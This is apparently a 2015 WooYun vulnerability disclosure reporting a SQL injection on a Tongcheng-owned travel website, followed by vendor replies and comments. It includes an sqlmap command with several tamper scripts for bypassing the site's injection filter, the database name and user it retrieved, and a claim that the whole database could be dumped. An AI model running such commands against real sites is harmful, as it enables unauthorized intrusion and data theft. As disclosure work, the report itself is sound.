漏洞概要
关注数(24)
关注此漏洞
漏洞标题:同程旅游旗下某旅游网站SQL注射漏洞危机该站数据(绕waf)
提交时间:2015-02-27 18:31
修复时间:2015-04-13 18:32
公开时间:2015-04-13 18:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-02-27: 细节已通知厂商并且等待厂商处理中
2015-02-27: 厂商已经确认,细节仅向厂商公开
2015-03-09: 细节向核心白帽子及相关领域专家公开
2015-03-19: 细节向普通白帽子公开
2015-03-29: 细节向实习白帽子公开
2015-04-13: 细节向公众公开
简要描述:
同程旅游某站拖走全网库
听说你们的rank很不错哦
详细说明:
注入:
参数:name
存在过滤,使用tamper
www.tycts.com\sql1\1.txt -p name --risk 3 --tamper space2mssqlhash.py,space2hash.py,charencode.py,charunicodeencode.py,space2comment.py --current-db
上图:
current database: 'TCLine'
current user: '17uLXSLine'
可以拖走全网库,本来是想用count来看看的,奈何表太多了,弄一些证明一下:
漏洞证明:
修复方案:
版权声明:转载请注明来源 BMa@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:16
确认时间:2015-02-27 18:34
厂商回复:
感谢关注同程旅游,兄弟看你这一串tamper脚本,绕过辛苦了,稍后会安排寄出300京东礼品卡以示谢意。
最新状态:
2015-02-27:另,这也不是waf,他们自己搞的防注入,见笑了。
2015-02-27:pss 这是同程旗下的六合一旅行社系统,洞主你该发通用,你亏了。
漏洞评价:
评论
-
2015-02-27 18:58 |
Mik3y_14 ( 普通白帽子 | Rank:181 漏洞数:29 | 愿君多采撷,此物最相思。)
-
2015-02-27 18:58 |
BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )
@苏州同程旅游网络科技有限公司 我还没弄清楚你们之间的关系另外 我原来的标题不是这样的
-
2015-02-27 19:18 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
@BMa 我跟厂商确认后改了下,因为域名,你懂得:)
-
2015-02-27 19:26 |
f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)
硬件waf:卧槽现在什么东西都能叫waf了,比如软件的xx狗和防注入代码
-
2015-02-28 11:00 |
BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )
@苏州同程旅游网络科技有限公司 还有另外一个注入点,睡一觉起来,你们就给补了 - - !昨天动静太大了
-
-
@BMa 这次能绕过就是真的绕waf了,绕过500,连之前的300一起发。不过下次就不要说拖库什么的了,开发受到的压力会很大的。
-
2015-03-03 20:23 |
BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )
@苏州同程旅游网络科技有限公司 我以为补了,没动了 有时间我再看看
-
2015-03-19 18:00 |
BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )
@苏州同程旅游网络科技有限公司 京东卡已经收到 感谢厂商理解白帽子